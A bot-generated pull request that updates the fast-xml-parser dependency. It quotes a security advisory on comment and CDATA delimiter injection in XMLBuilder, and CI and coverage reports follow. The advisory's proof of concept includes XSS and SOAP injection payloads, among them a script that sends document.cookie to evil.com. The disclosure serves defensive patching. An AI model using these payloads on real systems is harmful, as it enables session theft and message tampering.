Update npm package fast-xml-parser to v5.7.0 [SECURITY]

[hash-worker]

This PR contains the following updates:

Package	Change	Age	Confidence
fast-xml-parser	5.5.7 -> 5.7.0

---

Warning

Some dependencies could not be looked up. Check the Dependency Dashboard for more information.

GitHub Vulnerability Alerts

CVE-2026-41650

fast-xml-parser XMLBuilder: Comment and CDATA Injection via Unescaped Delimiters

Summary

fast-xml-parser XMLBuilder does not escape the --> sequence in comment content or the ]]> sequence in CDATA sections when building XML from JavaScript objects. This allows XML injection when user-controlled data flows into comments or CDATA elements, leading to XSS, SOAP injection, or data manipulation.

Existing CVEs for fast-xml-parser cover different issues:

• CVE-2023-26920: Prototype pollution (parser)
• CVE-2023-34104: ReDoS (parser)
• CVE-2026-27942: Stack overflow in XMLBuilder with preserveOrder
• CVE-2026-25896: Entity encoding bypass via regex in DOCTYPE entities

This finding covers unescaped comment/CDATA delimiters in XMLBuilder - a distinct vulnerability.

Vulnerable Code

File: src/fxb.js

// Line 442 - Comment building with NO escaping of -->
buildTextValNode(val, key, attrStr, level) {
    // ...
    if (key === this.options.commentPropName) {
        return this.indentate(level) + `<!--${val}-->` + this.newLine;  // VULNERABLE
    }
    // ...
    if (key === this.options.cdataPropName) {
        return this.indentate(level) + `<![CDATA[${val}]]>` + this.newLine;  // VULNERABLE
    }
}

Compare with attribute/text escaping which IS properly handled via replaceEntitiesValue().

Proof of Concept

Test 1: Comment Injection (XSS in SVG/HTML context)

import { XMLBuilder } from 'fast-xml-parser';

const builder = new XMLBuilder({
  commentPropName: "#comment",
  format: true,
  suppressEmptyNode: true
});

const xml = {
  root: {
    "#comment": "--><script>alert('XSS')</script><!--",
    data: "legitimate content"
  }
};

console.log(builder.build(xml));

Output:

<root>
  <!----><script>alert('XSS')</script><!---->
  <data>legitimate content</data>
</root>

Test 2: CDATA Injection (RSS feed)

const builder = new XMLBuilder({
  cdataPropName: "#cdata",
  format: true,
  suppressEmptyNode: true
});

const rss = {
  rss: { channel: { item: {
    title: "Article",
    description: {
      "#cdata": "Content]]><script>fetch('https://evil.com/'+document.cookie)</script><![CDATA[more"
    }
  }}}
};

console.log(builder.build(rss));

Output:

<rss>
  <channel>
    <item>
      <title>Article</title>
      <description>
        <![CDATA[Content]]><script>fetch('https://evil.com/'+document.cookie)</script><![CDATA[more]]>
      </description>
    </item>
  </channel>
</rss>

Test 3: SOAP Message Injection

const builder = new XMLBuilder({
  commentPropName: "#comment",
  format: true
});

const soap = {
  "soap:Envelope": {
    "soap:Body": {
      "#comment": "Request from user: --><soap:Body><Action>deleteAll</Action></soap:Body><!--",
      Action: "getBalance",
      UserId: "12345"
    }
  }
};

console.log(builder.build(soap));

Output:

<soap:Envelope>
  <soap:Body>
    <!--Request from user: --><soap:Body><Action>deleteAll</Action></soap:Body><!---->
    <Action>getBalance</Action>
    <UserId>12345</UserId>
  </soap:Body>
</soap:Envelope>

The injected <Action>deleteAll</Action> appears as a real SOAP action element.

Tested Output

All tests run on Node.js v22, fast-xml-parser v5.5.12:

1. COMMENT INJECTION:
   Injection successful: true

2. CDATA INJECTION (RSS feed scenario):
   Injection successful: true

4. Round-trip test:
   Injection present: true

5. SOAP MESSAGE INJECTION:
   Contains injected Action: true

Impact

An attacker who controls data that flows into XML comments or CDATA sections via XMLBuilder can:

1. XSS: Inject <script> tags into XML/SVG/HTML documents served to browsers
2. SOAP injection: Modify SOAP message structure by injecting XML elements
3. RSS/Atom feed poisoning: Inject scripts into RSS feed items via CDATA breakout
4. XML document manipulation: Break XML structure by escaping comment/CDATA context

This is practically exploitable whenever applications use XMLBuilder to generate XML from data that includes user-controlled content in comments or CDATA (e.g., RSS feeds, SOAP services, SVG generation, config files).

Suggested Fix

Escape delimiters in comment and CDATA content:

// For comments: replace -- with escaped equivalent
if (key === this.options.commentPropName) {
    const safeVal = String(val).replace(/--/g, '&#​45;&#​45;');
    return this.indentate(level) + `<!--${safeVal}-->` + this.newLine;
}

// For CDATA: split on ]]> and rejoin with separate CDATA sections
if (key === this.options.cdataPropName) {
    const safeVal = String(val).replace(/]]>/g, ']]]]><![CDATA[>');
    return this.indentate(level) + `<![CDATA[${safeVal}]]>` + this.newLine;
}

---

Release Notes

NaturalIntelligence/fast-xml-parser (fast-xml-parser)

v5.7.0

Compare Source

v5.6.0: use @​nodable/entities to replace entities

Compare Source

• No API change
• No change in performance for basic usage
• No typing change
• No config change
• new dependency
• breaking: error messages for entities might have been changed.

Full Changelog: NaturalIntelligence/fast-xml-parser@v5.5.12...v5.6.0

v5.5.12

Compare Source

v5.5.11

Compare Source

v5.5.10: performance improvment, increase entity expansion default limit

Compare Source

• increase default entity explansion limit as many projects demand for that

maxEntitySize: 10000,
maxExpansionDepth: 10000,
maxTotalExpansions: Infinity,
maxExpandedLength: 100000,
maxEntityCount: 1000,

• performance improvement
  • reduce calls to toString
  • early return when entities are not present
  • prepare rawAttrsForMatcher only if user sets jPath: false

Full Changelog: NaturalIntelligence/fast-xml-parser@v5.5.9...v5.5.10

v5.5.9: fix typins and matcher instance in callbacks

Compare Source

combine typings file to avoid configuration changes
pass readonly instance of matcher to the call backs to avoid accidental push/pop call

v5.5.8

Compare Source

---

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - "before 4am every weekday,every weekend" (UTC).

🚦 Automerge: Enabled.

♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR has been generated by Renovate Bot.

[vercel]

The latest updates on your projects. Learn more about Vercel for GitHub.

Project	Deployment	Actions	Updated (UTC)
hash	Ready	Preview, Comment	Apr 22, 2026 10:38pm
hashdotdesign-tokens	Ready	Preview, Comment	Apr 22, 2026 10:38pm
petrinaut	Ready	Preview, Comment	Apr 22, 2026 10:38pm

[cursor]

PR Summary

Medium Risk
Dependency-only change, but it updates XML parsing/building internals and transitive packages, which could subtly alter generated XML or parsing behavior in any code paths using fast-xml-parser. Security-driven upgrade reduces exposure but warrants validation of XML output compatibility.

Overview
Updates the pinned fast-xml-parser resolution from 5.5.7 to 5.7.0.

Refreshes yarn.lock to match the new release, including new transitive dependency @nodable/entities and bumps to related XML utility packages (fast-xml-builder, path-expression-matcher, strnum).

^{Reviewed by Cursor Bugbot for commit d317984. Bugbot is set up for automated code reviews on this repo. Configure here.}

[augmentcode]

🤖 Augment PR Summary

Summary: Updates the repo’s Yarn resolution for fast-xml-parser to a newer patched release to address the security advisory referenced in the PR.

Changes:

• Bumped fast-xml-parser from 5.5.7 to 5.7.0 in the root package.json resolutions.
• Regenerated the lockfile to pick up the upgraded package version.

Technical Notes: This is a security-driven upgrade; ensure any transitive uses of fast-xml-parser (especially XML building paths) continue to behave as expected after the bump.

_{🤖 Was this summary useful? React with 👍 or 👎}

[augmentcode]

Review completed. No suggestions at this time.

Comment augment review to trigger a new review at any time.

[codecov]

Codecov Report

✅ All modified and coverable lines are covered by tests.
✅ Project coverage is 62.49%. Comparing base (adb5688) to head (d317984).
⚠️ Report is 6 commits behind head on main.

Additional details and impacted files

@@            Coverage Diff             @@
##             main    #8654      +/-   ##
==========================================
- Coverage   62.50%   62.49%   -0.01%     
==========================================
  Files        1318     1318              
  Lines      134234   134234              
  Branches     5520     5520              
==========================================
- Hits        83906    83896      -10     
- Misses      49415    49423       +8     
- Partials      913      915       +2     

Flag	Coverage Δ
apps.hash-ai-worker-ts	1.40% <ø> (ø)
apps.hash-api	0.00% <ø> (ø)
blockprotocol.type-system	40.84% <ø> (ø)
local.claude-hooks	0.00% <ø> (ø)
local.harpc-client	51.24% <ø> (ø)
local.hash-graph-sdk	9.63% <ø> (ø)
local.hash-isomorphic-utils	0.00% <ø> (ø)
rust.antsi	0.00% <ø> (ø)
rust.error-stack	90.87% <ø> (ø)
rust.harpc-codec	84.70% <ø> (ø)
rust.harpc-net	96.22% <ø> (-0.16%)	⬇️
rust.harpc-tower	67.03% <ø> (ø)
rust.harpc-types	0.00% <ø> (ø)
rust.harpc-wire-protocol	92.23% <ø> (ø)
rust.hash-codec	72.76% <ø> (ø)
rust.hash-graph-api	2.52% <ø> (ø)
rust.hash-graph-authorization	62.34% <ø> (ø)
rust.hash-graph-postgres-store	26.38% <ø> (ø)
rust.hash-graph-store	37.76% <ø> (ø)
rust.hash-graph-temporal-versioning	47.95% <ø> (ø)
rust.hash-graph-types	0.00% <ø> (ø)
rust.hash-graph-validation	83.45% <ø> (ø)
rust.hashql-ast	87.23% <ø> (ø)
rust.hashql-compiletest	29.69% <ø> (ø)
rust.hashql-core	82.29% <ø> (ø)
rust.hashql-diagnostics	72.43% <ø> (ø)
rust.hashql-eval	69.13% <ø> (ø)
rust.hashql-hir	89.06% <ø> (ø)
rust.hashql-mir	92.64% <ø> (ø)
rust.hashql-syntax-jexpr	94.05% <ø> (ø)

Flags with carried forward coverage won't be shown. Click here to find out more.

☔ View full report in Codecov by Sentry.
📢 Have feedback on the report? Share it here.

🚀 New features to boost your workflow:

• ❄️ Test Analytics: Detect flaky tests, report on failures, and find test suite problems.
• 📦 JS Bundle Analysis: Save yourself from yourself by tracking and limiting bundle sizes in JS merges.

[codspeed-hq]

Merging this PR will not alter performance

✅ 80 untouched benchmarks

---

_{Comparing deps/js/npm-fast-xml-parser-vulnerability (d317984) with main (23b7c56)}

[github-actions]

Benchmark results

@rust/hash-graph-benches – Integrations

policy_resolution_large

Function	Value	Mean	Flame graphs
resolve_policies_for_actor	user: empty, selectivity: high, policies: 2002	$$26.4 \mathrm{ms} \pm 159 \mathrm{μs}\left({\color{gray}-0.405 \mathrm{\%}}\right) $$	Flame Graph
resolve_policies_for_actor	user: empty, selectivity: low, policies: 1	$$2.85 \mathrm{ms} \pm 11.3 \mathrm{μs}\left({\color{gray}0.541 \mathrm{\%}}\right) $$	Flame Graph
resolve_policies_for_actor	user: empty, selectivity: medium, policies: 1001	$$12.1 \mathrm{ms} \pm 64.1 \mathrm{μs}\left({\color{gray}0.961 \mathrm{\%}}\right) $$	Flame Graph
resolve_policies_for_actor	user: seeded, selectivity: high, policies: 3314	$$39.0 \mathrm{ms} \pm 323 \mathrm{μs}\left({\color{gray}0.277 \mathrm{\%}}\right) $$	Flame Graph
resolve_policies_for_actor	user: seeded, selectivity: low, policies: 1	$$12.4 \mathrm{ms} \pm 96.6 \mathrm{μs}\left({\color{gray}2.80 \mathrm{\%}}\right) $$	Flame Graph
resolve_policies_for_actor	user: seeded, selectivity: medium, policies: 1526	$$21.5 \mathrm{ms} \pm 149 \mathrm{μs}\left({\color{gray}0.866 \mathrm{\%}}\right) $$	Flame Graph
resolve_policies_for_actor	user: system, selectivity: high, policies: 2078	$$27.6 \mathrm{ms} \pm 157 \mathrm{μs}\left({\color{gray}-0.847 \mathrm{\%}}\right) $$	Flame Graph
resolve_policies_for_actor	user: system, selectivity: low, policies: 1	$$3.10 \mathrm{ms} \pm 14.1 \mathrm{μs}\left({\color{gray}0.296 \mathrm{\%}}\right) $$	Flame Graph
resolve_policies_for_actor	user: system, selectivity: medium, policies: 1033	$$13.0 \mathrm{ms} \pm 75.7 \mathrm{μs}\left({\color{gray}0.765 \mathrm{\%}}\right) $$	Flame Graph

policy_resolution_medium

Function	Value	Mean	Flame graphs
resolve_policies_for_actor	user: empty, selectivity: high, policies: 102	$$3.15 \mathrm{ms} \pm 19.9 \mathrm{μs}\left({\color{gray}0.497 \mathrm{\%}}\right) $$	Flame Graph
resolve_policies_for_actor	user: empty, selectivity: low, policies: 1	$$2.42 \mathrm{ms} \pm 11.3 \mathrm{μs}\left({\color{gray}0.874 \mathrm{\%}}\right) $$	Flame Graph
resolve_policies_for_actor	user: empty, selectivity: medium, policies: 51	$$2.73 \mathrm{ms} \pm 16.3 \mathrm{μs}\left({\color{gray}-0.308 \mathrm{\%}}\right) $$	Flame Graph
resolve_policies_for_actor	user: seeded, selectivity: high, policies: 269	$$4.44 \mathrm{ms} \pm 36.6 \mathrm{μs}\left({\color{gray}-0.412 \mathrm{\%}}\right) $$	Flame Graph
resolve_policies_for_actor	user: seeded, selectivity: low, policies: 1	$$2.92 \mathrm{ms} \pm 12.5 \mathrm{μs}\left({\color{gray}-0.824 \mathrm{\%}}\right) $$	Flame Graph
resolve_policies_for_actor	user: seeded, selectivity: medium, policies: 107	$$3.48 \mathrm{ms} \pm 18.7 \mathrm{μs}\left({\color{gray}-0.302 \mathrm{\%}}\right) $$	Flame Graph
resolve_policies_for_actor	user: system, selectivity: high, policies: 133	$$3.78 \mathrm{ms} \pm 24.7 \mathrm{μs}\left({\color{gray}-0.201 \mathrm{\%}}\right) $$	Flame Graph
resolve_policies_for_actor	user: system, selectivity: low, policies: 1	$$2.82 \mathrm{ms} \pm 16.3 \mathrm{μs}\left({\color{gray}0.755 \mathrm{\%}}\right) $$	Flame Graph
resolve_policies_for_actor	user: system, selectivity: medium, policies: 63	$$3.37 \mathrm{ms} \pm 21.7 \mathrm{μs}\left({\color{gray}-0.621 \mathrm{\%}}\right) $$	Flame Graph

policy_resolution_none

Function	Value	Mean	Flame graphs
resolve_policies_for_actor	user: empty, selectivity: high, policies: 2	$$2.19 \mathrm{ms} \pm 13.0 \mathrm{μs}\left({\color{gray}0.383 \mathrm{\%}}\right) $$	Flame Graph
resolve_policies_for_actor	user: empty, selectivity: low, policies: 1	$$2.15 \mathrm{ms} \pm 9.36 \mathrm{μs}\left({\color{gray}-0.837 \mathrm{\%}}\right) $$	Flame Graph
resolve_policies_for_actor	user: empty, selectivity: medium, policies: 1	$$2.25 \mathrm{ms} \pm 9.23 \mathrm{μs}\left({\color{gray}-2.242 \mathrm{\%}}\right) $$	Flame Graph
resolve_policies_for_actor	user: system, selectivity: high, policies: 8	$$2.44 \mathrm{ms} \pm 11.9 \mathrm{μs}\left({\color{gray}0.348 \mathrm{\%}}\right) $$	Flame Graph
resolve_policies_for_actor	user: system, selectivity: low, policies: 1	$$2.29 \mathrm{ms} \pm 10.3 \mathrm{μs}\left({\color{gray}-0.463 \mathrm{\%}}\right) $$	Flame Graph
resolve_policies_for_actor	user: system, selectivity: medium, policies: 3	$$2.53 \mathrm{ms} \pm 16.1 \mathrm{μs}\left({\color{gray}-0.101 \mathrm{\%}}\right) $$	Flame Graph

policy_resolution_small

Function	Value	Mean	Flame graphs
resolve_policies_for_actor	user: empty, selectivity: high, policies: 52	$$2.53 \mathrm{ms} \pm 15.2 \mathrm{μs}\left({\color{gray}0.469 \mathrm{\%}}\right) $$	Flame Graph
resolve_policies_for_actor	user: empty, selectivity: low, policies: 1	$$2.27 \mathrm{ms} \pm 12.2 \mathrm{μs}\left({\color{gray}1.35 \mathrm{\%}}\right) $$	Flame Graph
resolve_policies_for_actor	user: empty, selectivity: medium, policies: 25	$$2.39 \mathrm{ms} \pm 13.6 \mathrm{μs}\left({\color{gray}0.756 \mathrm{\%}}\right) $$	Flame Graph
resolve_policies_for_actor	user: seeded, selectivity: high, policies: 94	$$2.85 \mathrm{ms} \pm 16.0 \mathrm{μs}\left({\color{gray}-0.252 \mathrm{\%}}\right) $$	Flame Graph
resolve_policies_for_actor	user: seeded, selectivity: low, policies: 1	$$2.49 \mathrm{ms} \pm 11.2 \mathrm{μs}\left({\color{gray}0.902 \mathrm{\%}}\right) $$	Flame Graph
resolve_policies_for_actor	user: seeded, selectivity: medium, policies: 26	$$2.67 \mathrm{ms} \pm 15.8 \mathrm{μs}\left({\color{gray}0.549 \mathrm{\%}}\right) $$	Flame Graph
resolve_policies_for_actor	user: system, selectivity: high, policies: 66	$$2.80 \mathrm{ms} \pm 14.0 \mathrm{μs}\left({\color{gray}0.603 \mathrm{\%}}\right) $$	Flame Graph
resolve_policies_for_actor	user: system, selectivity: low, policies: 1	$$2.48 \mathrm{ms} \pm 13.3 \mathrm{μs}\left({\color{gray}1.00 \mathrm{\%}}\right) $$	Flame Graph
resolve_policies_for_actor	user: system, selectivity: medium, policies: 29	$$2.69 \mathrm{ms} \pm 13.8 \mathrm{μs}\left({\color{gray}0.263 \mathrm{\%}}\right) $$	Flame Graph

read_scaling_complete

Function	Value	Mean	Flame graphs
entity_by_id;one_depth	1 entities	$$39.0 \mathrm{ms} \pm 153 \mathrm{μs}\left({\color{gray}1.34 \mathrm{\%}}\right) $$	Flame Graph
entity_by_id;one_depth	10 entities	$$77.0 \mathrm{ms} \pm 316 \mathrm{μs}\left({\color{gray}-2.270 \mathrm{\%}}\right) $$	Flame Graph
entity_by_id;one_depth	25 entities	$$42.7 \mathrm{ms} \pm 192 \mathrm{μs}\left({\color{gray}-0.089 \mathrm{\%}}\right) $$	Flame Graph
entity_by_id;one_depth	5 entities	$$47.5 \mathrm{ms} \pm 186 \mathrm{μs}\left({\color{gray}0.367 \mathrm{\%}}\right) $$	Flame Graph
entity_by_id;one_depth	50 entities	$$54.7 \mathrm{ms} \pm 250 \mathrm{μs}\left({\color{gray}0.286 \mathrm{\%}}\right) $$	Flame Graph
entity_by_id;two_depth	1 entities	$$41.5 \mathrm{ms} \pm 282 \mathrm{μs}\left({\color{gray}0.469 \mathrm{\%}}\right) $$	Flame Graph
entity_by_id;two_depth	10 entities	$$420 \mathrm{ms} \pm 1.01 \mathrm{ms}\left({\color{gray}-3.004 \mathrm{\%}}\right) $$	Flame Graph
entity_by_id;two_depth	25 entities	$$92.3 \mathrm{ms} \pm 355 \mathrm{μs}\left({\color{gray}1.90 \mathrm{\%}}\right) $$	Flame Graph
entity_by_id;two_depth	5 entities	$$91.5 \mathrm{ms} \pm 376 \mathrm{μs}\left({\color{gray}0.447 \mathrm{\%}}\right) $$	Flame Graph
entity_by_id;two_depth	50 entities	$$259 \mathrm{ms} \pm 872 \mathrm{μs}\left({\color{lightgreen}-9.940 \mathrm{\%}}\right) $$	Flame Graph
entity_by_id;zero_depth	1 entities	$$16.7 \mathrm{ms} \pm 71.4 \mathrm{μs}\left({\color{gray}-1.699 \mathrm{\%}}\right) $$	Flame Graph
entity_by_id;zero_depth	10 entities	$$17.6 \mathrm{ms} \pm 95.9 \mathrm{μs}\left({\color{gray}-0.965 \mathrm{\%}}\right) $$	Flame Graph
entity_by_id;zero_depth	25 entities	$$17.6 \mathrm{ms} \pm 102 \mathrm{μs}\left({\color{gray}-1.357 \mathrm{\%}}\right) $$	Flame Graph
entity_by_id;zero_depth	5 entities	$$17.3 \mathrm{ms} \pm 88.9 \mathrm{μs}\left({\color{gray}-0.806 \mathrm{\%}}\right) $$	Flame Graph
entity_by_id;zero_depth	50 entities	$$21.4 \mathrm{ms} \pm 92.1 \mathrm{μs}\left({\color{gray}-3.297 \mathrm{\%}}\right) $$	Flame Graph

read_scaling_linkless

Function	Value	Mean	Flame graphs
entity_by_id	1 entities	$$17.0 \mathrm{ms} \pm 99.6 \mathrm{μs}\left({\color{gray}-1.140 \mathrm{\%}}\right) $$	Flame Graph
entity_by_id	10 entities	$$16.9 \mathrm{ms} \pm 94.0 \mathrm{μs}\left({\color{gray}-0.533 \mathrm{\%}}\right) $$	Flame Graph
entity_by_id	100 entities	$$17.1 \mathrm{ms} \pm 88.7 \mathrm{μs}\left({\color{gray}0.546 \mathrm{\%}}\right) $$	Flame Graph
entity_by_id	1000 entities	$$17.7 \mathrm{ms} \pm 88.1 \mathrm{μs}\left({\color{gray}0.551 \mathrm{\%}}\right) $$	Flame Graph
entity_by_id	10000 entities	$$24.1 \mathrm{ms} \pm 145 \mathrm{μs}\left({\color{gray}-1.031 \mathrm{\%}}\right) $$	Flame Graph

representative_read_entity

Function	Value	Mean	Flame graphs
entity_by_id	entity type ID: https://blockprotocol.org/@alice/types/entity-type/block/v/1	$$31.1 \mathrm{ms} \pm 297 \mathrm{μs}\left({\color{gray}-3.380 \mathrm{\%}}\right) $$	Flame Graph
entity_by_id	entity type ID: https://blockprotocol.org/@alice/types/entity-type/book/v/1	$$31.2 \mathrm{ms} \pm 312 \mathrm{μs}\left({\color{gray}-0.323 \mathrm{\%}}\right) $$	Flame Graph
entity_by_id	entity type ID: https://blockprotocol.org/@alice/types/entity-type/building/v/1	$$30.9 \mathrm{ms} \pm 265 \mathrm{μs}\left({\color{gray}-2.553 \mathrm{\%}}\right) $$	Flame Graph
entity_by_id	entity type ID: https://blockprotocol.org/@alice/types/entity-type/organization/v/1	$$31.6 \mathrm{ms} \pm 312 \mathrm{μs}\left({\color{gray}-0.311 \mathrm{\%}}\right) $$	Flame Graph
entity_by_id	entity type ID: https://blockprotocol.org/@alice/types/entity-type/page/v/2	$$31.5 \mathrm{ms} \pm 273 \mathrm{μs}\left({\color{gray}-0.583 \mathrm{\%}}\right) $$	Flame Graph
entity_by_id	entity type ID: https://blockprotocol.org/@alice/types/entity-type/person/v/1	$$31.7 \mathrm{ms} \pm 263 \mathrm{μs}\left({\color{gray}0.735 \mathrm{\%}}\right) $$	Flame Graph
entity_by_id	entity type ID: https://blockprotocol.org/@alice/types/entity-type/playlist/v/1	$$30.7 \mathrm{ms} \pm 285 \mathrm{μs}\left({\color{gray}-1.597 \mathrm{\%}}\right) $$	Flame Graph
entity_by_id	entity type ID: https://blockprotocol.org/@alice/types/entity-type/song/v/1	$$31.4 \mathrm{ms} \pm 305 \mathrm{μs}\left({\color{gray}2.36 \mathrm{\%}}\right) $$	Flame Graph
entity_by_id	entity type ID: https://blockprotocol.org/@alice/types/entity-type/uk-address/v/1	$$31.4 \mathrm{ms} \pm 258 \mathrm{μs}\left({\color{gray}0.842 \mathrm{\%}}\right) $$	Flame Graph

representative_read_entity_type

Function	Value	Mean	Flame graphs
get_entity_type_by_id	Account ID: bf5a9ef5-dc3b-43cf-a291-6210c0321eba	$$6.93 \mathrm{ms} \pm 31.3 \mathrm{μs}\left({\color{gray}0.276 \mathrm{\%}}\right) $$	Flame Graph

representative_read_multiple_entities

Function	Value	Mean	Flame graphs
entity_by_property	traversal_paths=0	0	$$93.7 \mathrm{ms} \pm 390 \mathrm{μs}\left({\color{gray}-0.034 \mathrm{\%}}\right) $$
entity_by_property	traversal_paths=255	1,resolve_depths=inherit:1;values:255;properties:255;links:127;link_dests:126;type:true	$$136 \mathrm{ms} \pm 529 \mathrm{μs}\left({\color{gray}-2.234 \mathrm{\%}}\right) $$
entity_by_property	traversal_paths=2	1,resolve_depths=inherit:0;values:0;properties:0;links:0;link_dests:0;type:false	$$101 \mathrm{ms} \pm 442 \mathrm{μs}\left({\color{gray}1.04 \mathrm{\%}}\right) $$
entity_by_property	traversal_paths=2	1,resolve_depths=inherit:0;values:0;properties:0;links:1;link_dests:0;type:true	$$107 \mathrm{ms} \pm 444 \mathrm{μs}\left({\color{gray}0.760 \mathrm{\%}}\right) $$
entity_by_property	traversal_paths=2	1,resolve_depths=inherit:0;values:0;properties:2;links:1;link_dests:0;type:true	$$115 \mathrm{ms} \pm 495 \mathrm{μs}\left({\color{gray}-0.473 \mathrm{\%}}\right) $$
entity_by_property	traversal_paths=2	1,resolve_depths=inherit:0;values:2;properties:2;links:1;link_dests:0;type:true	$$119 \mathrm{ms} \pm 447 \mathrm{μs}\left({\color{gray}-0.752 \mathrm{\%}}\right) $$
link_by_source_by_property	traversal_paths=0	0	$$98.5 \mathrm{ms} \pm 468 \mathrm{μs}\left({\color{gray}-1.855 \mathrm{\%}}\right) $$
link_by_source_by_property	traversal_paths=255	1,resolve_depths=inherit:1;values:255;properties:255;links:127;link_dests:126;type:true	$$122 \mathrm{ms} \pm 523 \mathrm{μs}\left({\color{gray}-0.555 \mathrm{\%}}\right) $$
link_by_source_by_property	traversal_paths=2	1,resolve_depths=inherit:0;values:0;properties:0;links:0;link_dests:0;type:false	$$105 \mathrm{ms} \pm 495 \mathrm{μs}\left({\color{gray}-1.205 \mathrm{\%}}\right) $$
link_by_source_by_property	traversal_paths=2	1,resolve_depths=inherit:0;values:0;properties:0;links:1;link_dests:0;type:true	$$111 \mathrm{ms} \pm 425 \mathrm{μs}\left({\color{gray}-1.834 \mathrm{\%}}\right) $$
link_by_source_by_property	traversal_paths=2	1,resolve_depths=inherit:0;values:0;properties:2;links:1;link_dests:0;type:true	$$113 \mathrm{ms} \pm 471 \mathrm{μs}\left({\color{gray}-1.236 \mathrm{\%}}\right) $$
link_by_source_by_property	traversal_paths=2	1,resolve_depths=inherit:0;values:2;properties:2;links:1;link_dests:0;type:true	$$113 \mathrm{ms} \pm 384 \mathrm{μs}\left({\color{gray}-0.912 \mathrm{\%}}\right) $$

scenarios

Function	Value	Mean	Flame graphs
full_test	query-limited	$$127 \mathrm{ms} \pm 498 \mathrm{μs}\left({\color{gray}3.66 \mathrm{\%}}\right) $$	Flame Graph
full_test	query-unlimited	$$135 \mathrm{ms} \pm 460 \mathrm{μs}\left({\color{gray}1.73 \mathrm{\%}}\right) $$	Flame Graph
linked_queries	query-limited	$$90.9 \mathrm{ms} \pm 506 \mathrm{μs}\left({\color{gray}1.55 \mathrm{\%}}\right) $$	Flame Graph
linked_queries	query-unlimited	$$503 \mathrm{ms} \pm 1.93 \mathrm{ms}\left({\color{gray}-3.388 \mathrm{\%}}\right) $$	Flame Graph